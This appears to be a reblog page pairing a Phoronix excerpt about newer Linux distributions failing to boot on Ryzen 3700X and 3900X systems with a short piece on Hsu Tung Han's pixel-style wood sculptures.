While Ubuntu 18.04 LTS and older Linux distributions boot Zen 2, to date I have not been able to successfully boot the likes of Ubuntu 19.04, Manjaro Linux, and Fedora Workstation 31. On all newer Linux distributions I’ve tried on two different systems built around the Ryzen 7 3700X and Ryzen 9 3900X, each time early in the boot process as soon as trying to start systemd services, all systemd services fail to start.

I’ve confirmed with AMD they do have an open issue surrounding “5.0.9” (the stock kernel of Ubuntu 19.04) but as of writing hadn’t shed any light into the issue. AMD has said their testing has been mostly focused on Ubuntu 18.04 given its LTS status. I’ve also confirmed the same behavior with some other Windows reviewers who occasionally dabble with Linux.

So unfortunately not being able to boot newer Linux distributions is a huge pain. I’ve spent days trying different BIOS versions/options, different kernel command line parameters, and other options to no avail. On some Linux distributions after roughly 20~30 minutes of waiting after all systemd services fail to start, sometimes there will be a kernel panic but that hadn’t occurred on all systems at least not within that time-frame.

Source: AMD Ryzen 7 3700X + Ryzen 9 3900X Offer Incredible Linux Performance But With A Big Caveat Review – Phoronix

Dynamic Wood Sculptures Carved to Look Like Pixelated Glitches

Taiwanese artist Hsu Tung Han, however, uses them for inspiration in his latest series of stunning wooden sculptures.

By carving delicate block-shaped details that separate from various parts of the sculpture, Han successfully creates the bizarre yet magnificently original illusion of pixelation in 3D form.

He applies this technique masterfully on his most recent finished product, which depicts a snorkeler underwater.

Here, the wooden ‘pixels’ seem to represent the water that surrounds and submerges the snorkeling man.

Han has been posting photos of his carved sculptures on Flickr since 2006, and has developed a unique niche for blending traditional styles of woodwork with modern artistic elements.

Source: Dynamic Wood Sculptures Carved to Look Like Pixelated Glitches – Stay Wild Moon Child

Posted in Art